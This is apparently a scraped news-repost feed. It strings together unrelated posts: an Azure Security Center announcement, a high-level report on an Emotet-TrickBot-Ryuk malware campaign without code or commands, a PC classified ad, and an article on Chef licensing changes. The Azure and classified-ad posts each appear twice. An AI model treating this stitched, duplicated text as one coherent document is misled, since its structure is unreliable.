Announcing new capabilities for the Microsoft Azure Security Center – Microsoft Security

Microsoft Azure Security Center—the central hub for monitoring and protecting against related incidents within Azure—has released new capabilities. The following features—announced at Hannover Messe 2019—are now generally available for the Azure Security Center:

  • Advanced Threat Protection for Azure Storage—Layer of protection that helps customers detect and respond to potential threats on their storage account as they occur—without having to be an expert in security.
  • Regulatory compliance dashboard—Helps Security Center customers streamline their compliance process by providing insight into their compliance posture for a set of supported standards and regulations.
  • Support for Virtual Machine Scale Sets (VMSS)—Easily monitor the security posture of your VMSS with security recommendations.
  • Dedicated Hardware Security Module (HSM) service, now available in U.K., Canada, and Australia—Provides cryptographic key storage in Azure and meets the most stringent customer security and compliance requirements.
  • Azure disk encryption support for VMSS—Now Azure disk encryption can be enabled for Windows and Linux VMSS in Azure public regions—enabling customers to help protect and safeguard the VMSS data at rest using industry standard encryption technology.

In addition, support for virtual machine sets are now generally available as part of the Azure Security Center. To learn more, read our Azure blog.

Go to Original Article
Author: Microsoft News Center

‘Triple threat’ malware campaign combines Emotet, TrickBot and Ryuk

Cybereason researchers discovered a malware campaign in which attackers combined the Emotet and TrickBot banking Trojans to deliver the Ryuk ransomware.

The malware campaign, dubbed “triple threat,” also uses TrickBot to perform lateral movement and employs detection evasion methods, like attempts to disable Windows Defender, Cybereason’s active monitoring and hunting teams found.

According to researchers, the campaign is targeting companies in both Europe and the U.S.

“The most interesting thing about this campaign is how it combined Emotet, TrickBot and Ryuk together,” said Lior Rochberger, security analyst at Cybereason. “Emotet is very common. But the way attackers abused this and took advantage of this malware in order to deliver another malware and, in the end, deliver the [Ryuk] ransomware to maximize the damage is something that is very unique.” 

The first phase of the malware campaign begins with a phishing email, in which a weaponized Microsoft Office document containing malicious macro-based code is delivered to the user. Once the user opens the document, the malicious file runs and executes a PowerShell command.

The PowerShell command then attempts to download the Emotet payload from different malicious domains.

Once the Emotet payload executes, it continues infecting and gathering information on the affected machine, Cybereason researchers explained in a blog post.

In the second phase of the attack, it initiates the download and execution of the TrickBot Trojan by communicating a remote host. Once TrickBot infects the machine, it begins to steal sensitive information, like administrator credentials.

It is TrickBot’s modular structure, researchers said, that allows it to add new functionalities outside of collecting banking data, such as collecting passwords and evading detection.

TrickBot’s modules are injected into legitimate processes in order to evade detection. Its modules include spreader_x64.dll, which spreads TrickBot by exploiting EternalBlue, which takes advantage of a flaw in Windows’ Server Message Block (SMB) protocol.

Cybereason, Emotet, TrickBot, Ryuk
Flow of the attack as Emotet delivers TrickBot, which delivers Ryuk.

Upon execution, TrickBot also tries to disable and delete Windows Defender to evade detection by antimalware products, researchers found.

In the final phase of the attack, the attackers check to see if the target machine is part of an industry they want to target. If it is, they download the Ryuk ransomware payload and use the admin credentials stolen using TrickBot to perform lateral movement and reach the assets they wish to infect, researchers said.

The most interesting thing about this campaign is how it combined Emotet, TrickBot and Ryuk together.
Lior RochbergerSecurity analyst at Cybereason

“After the phase of the lateral movement, the reconnaissance activity, the credential theft and information stealing, then it basically delivers the Ryuk ransomware, which encrypts the files,” Rochberger said. “Ryuk injects the malicious payload into legitimate processes, and then it encrypts and ransoms the files. TrickBot also uses this technique to inject its malicious modules — DLLs [dynamic link libraries] — into legitimate processes. Due to this technique, normal and old-fashioned antivirus that is signature-based is not effective.”

But Rochberger said she believes this malware campaign doesn’t necessarily mean cybercriminal groups are joining forces to carry out attacks.

“We do see that different cybercriminal groups are using the same techniques or the same tools as other groups are using,” she said. “For example, the Ryuk itself was used by the Lazarus Group, but it doesn’t necessarily mean that this campaign was by the Lazarus Group. We know that the Ryuk code was on sale on the internet, so other threat actors may have used this code, as well, for their malicious activity.”

But given that the attackers are using malware like Emotet to spread the attack as an initial infection, Rochberger advised companies to be aware of how threat actors can take advantage of existing malware for new attacks and campaigns.

Researchers advised companies to employ threat hunting for detecting such malware campaigns and also be up to date with implementing patches, especially for the Windows SMB v1 vulnerability, to prevent the propagation of TrickBot and other malware.

Go to Original Article
Author:

For Sale – Watercooled PC (i7 4770K, GTX 980ti, 16GB DDR3, Corsair AX860) 480mm + 420mm Rads

Plan to strip this down. Would like to sell as complete system first.

Price: 1,100 GBP

Case:
Phanteks Enthoo Primo (includes PWM fan controller)

IMG_20190211_125918.jpg

Price and currency: 1,100 GBP
Delivery: Delivery cost is not included
Payment method: BT
Location: Bristol / North Somerset
Advertised elsewhere?: Not advertised elsewhere
Prefer goods collected?: I prefer the goods to be collected

______________________________________________________
This message is automatically inserted in all classifieds forum threads.
By replying to this thread you agree to abide by the trading rules detailed here.
Please be advised, all buyers and sellers should satisfy themselves that the other party is genuine by providing the following via private conversation to each other after negotiations are complete and prior to dispatching goods and making payment:

  • Landline telephone number. Make a call to check out the area code and number are correct, too
  • Name and address including postcode
  • Valid e-mail address

DO NOT proceed with a deal until you are completely satisfied with all details being correct. It’s in your best interest to check out these details yourself.

Go to Original Article
Author:

Announcing new capabilities for the Microsoft Azure Security Center – Microsoft Security

Microsoft Azure Security Center—the central hub for monitoring and protecting against related incidents within Azure—has released new capabilities. The following features—announced at Hannover Messe 2019—are now generally available for the Azure Security Center:

  • Advanced Threat Protection for Azure Storage—Layer of protection that helps customers detect and respond to potential threats on their storage account as they occur—without having to be an expert in security.
  • Regulatory compliance dashboard—Helps Security Center customers streamline their compliance process by providing insight into their compliance posture for a set of supported standards and regulations.
  • Support for Virtual Machine Scale Sets (VMSS)—Easily monitor the security posture of your VMSS with security recommendations.
  • Dedicated Hardware Security Module (HSM) service, now available in U.K., Canada, and Australia—Provides cryptographic key storage in Azure and meets the most stringent customer security and compliance requirements.
  • Azure disk encryption support for VMSS—Now Azure disk encryption can be enabled for Windows and Linux VMSS in Azure public regions—enabling customers to help protect and safeguard the VMSS data at rest using industry standard encryption technology.

In addition, support for virtual machine sets are now generally available as part of the Azure Security Center. To learn more, read our Azure blog.

Go to Original Article
Author: Microsoft News Center

Chef licensing changes prompt debate among IT pros

Chef has overhauled the licensing terms for its IT automation software and some customers are apprehensive about what the changes might mean for their future IT budgets.

Chef has operated under what it terms a “loose” open core business model, where it distributes open source versions of Chef software for configuration management, InSpec for security and compliance, and Habitat for application automation. Chef Automate, a proprietary product, tied together Chef’s other software components for paying customers.

Starting this week, however, all of Chef’s software code, including Chef Automate, is available in open source repositories and developed under an open Apache 2.0 license, and customers that buy support have two suite subscription options. Effortless Infrastructure includes Chef Infra, the new name for Chef’s configuration management tool, as well as InSpec and Automate; and the Enterprise Automation Stack, which adds Habitat. Each product will also be available separately as a subscription with updated pricing.

Corey Scobie, ChefCorey Scobie

A sticking point for some users comes in the fine print for the new Chef licensing terms. This is where Chef retains its trademarks, which include Chef, InSpec, Habitat and Automate. Small IT teams can experiment with Chef’s binaries for free, but should they use the Chef software for commercial purposes, Chef requires them to pay for support or host their own renamed distribution of the code. These changes take effect with the release of Chef 15 next month, at which point Chef 13 support will end. Customers that use Chef 14 will have a year to decide how they’ll proceed with support contracts.

Customers that already have a commercial relationship with Chef will see no change to their costs, said Corey Scobie, senior vice president of product and engineering at Chef. “Users who have purely open source Chef at scale will have some decisions to make about whether to go out on their own or start a contractual relationship,” he said.

Chef users’ reactions mixed

Longtime Chef software customers said the move could enable Chef to prioritize enterprise customer support, and an open source version of the Chef Automate tool may pique fresh interest among developers.

“It makes a lot of sense from a business perspective to focus the company on the people who fund it,” said Michael Hedgpeth, director of software engineering at Atlanta-based NCR Corp., which makes point-of-sale systems, self-service kiosks, ATMs and other retail data processing systems.

However, Hedgpeth said he hoped to use open source Chef software to manage an internet of things (IoT) environment with millions of endpoints spread out over tens of thousands of customer locations, and is concerned about how the new license terms might play out there.

As a hosted Chef Automate customer, I think it’s a positive thing, but as a technology evangelist working to expand Chef’s reach within NCR for IoT, it’s frustrating.
Michael HedgpethDirector of software engineering, NCR Corp.

“It could upset the economic and operational equation,” he said. “As a hosted Chef Automate customer, I think it’s a positive thing, but as a technology evangelist working to expand Chef’s reach within NCR for IoT, it’s frustrating.”

Hedgpeth drew a comparison between Chef’s licensing terms and Red Hat’s business model for Red Hat Enterprise Linux. CentOS, a similar but free and open source version of that operating system, sprang up in the community about 10 years ago and is now supported by Red Hat.

“I want an official free alternative — if Chef wants to be Red Hat, let’s make a CentOS,” Hedgpeth said.

Chef isn’t opposed to that idea, said Brian Goldfarb, chief marketing officer at Chef. However, he pointed out that Red Hat and CentOS did not start out as collaborators and it will take time for a community-based version of Chef’s software code to mature.

Hedgpeth is a staunch Chef loyalist. NCR began with Chef Server five years ago, and its configuration management features eliminated 97% of deployment-related outages for his team. NCR renewed its Chef software license last week under the previous terms. But Hedgpeth said he isn’t sure how Chef license costs will play out in the next contract renewal next year.

“I’m kind of anchored to the pricing I remember from the beginning,” he said. “If I was looking for an IT automation platform now and had 100 or so nodes, it might make more sense, but I have thousands, and there’s the IoT issue.”

Chef is willing to negotiate volume discounts with large-scale customers such as NCR under the new licensing terms, Goldfarb said.

Business strategy a pervasive issue for open source companies

Chef’s licensing changes come amid an uneasy climate for vendors that base their business on open source code, from MongoDB and Redis spats with AWS to executive shuffles at companies such as Puppet and Docker Inc.

Chef’s founder and former CTO, Adam Jacob, who stepped down as CTO and switched to a role with the board of directors at Chef in January 2019, weighed in on the future of open core business in a December 2018 blog post. That kicked off a project founded by Jacob, Sustainable Free and Open Source Communities, “organized around the development of a set of shared principles that we believe lead to healthy, sustainable open source communities,” according to the group’s website.

Chef executives said they plan to take a different path to address the same problem that’s riled up MongoDB, Redis and similar vendors. They said their belief is that those peers have moved away from true open source code, while the open source donation of Chef Automate represents a step further toward it.

Some Chef software users in small shops predict that open source Chef Automate will expand the product’s influence and name recognition.

“We’re just getting started, but now we’ll have access to the whole suite, to experiment and test,” said Christopher Maher, a software engineer at a startup he asked not to be named. Maher previously used Chef software in an enterprise IT environment at Alaska Airlines. “Chef Automate can also benefit from community input, thousands of eyes that look at the product instead of a closed development group focused on the business,” he said.

The bottom line is that while Chef said it pulled in record revenue in the fourth quarter of 2018, it must focus on long-term financial growth and enterprise contract renewals in a fiercely competitive market.

“Making money in open source is really hard, and a lot of companies as they mature have to think about where their revenue is going to come from, and what their differentiation is,” said Stephen Elliot, analyst at IDC. “I expect them to have more focus on the bigger customers that want to choose Chef as a strategic platform, prioritize their feedback in feature backlogs, and increased levels of support.”

Go to Original Article
Author:

For Sale – Watercooled PC (i7 4770K, GTX 980ti, 16GB DDR3, Corsair AX860) 480mm + 420mm Rads

Plan to strip this down. Would like to sell as complete system first.

Price: 1,100 GBP

Case:
Phanteks Enthoo Primo (includes PWM fan controller)

IMG_20190211_125918.jpg

Price and currency: 1,100 GBP
Delivery: Delivery cost is not included
Payment method: BT
Location: Bristol / North Somerset
Advertised elsewhere?: Not advertised elsewhere
Prefer goods collected?: I prefer the goods to be collected

______________________________________________________
This message is automatically inserted in all classifieds forum threads.
By replying to this thread you agree to abide by the trading rules detailed here.
Please be advised, all buyers and sellers should satisfy themselves that the other party is genuine by providing the following via private conversation to each other after negotiations are complete and prior to dispatching goods and making payment:

  • Landline telephone number. Make a call to check out the area code and number are correct, too
  • Name and address including postcode
  • Valid e-mail address

DO NOT proceed with a deal until you are completely satisfied with all details being correct. It’s in your best interest to check out these details yourself.

Go to Original Article
Author: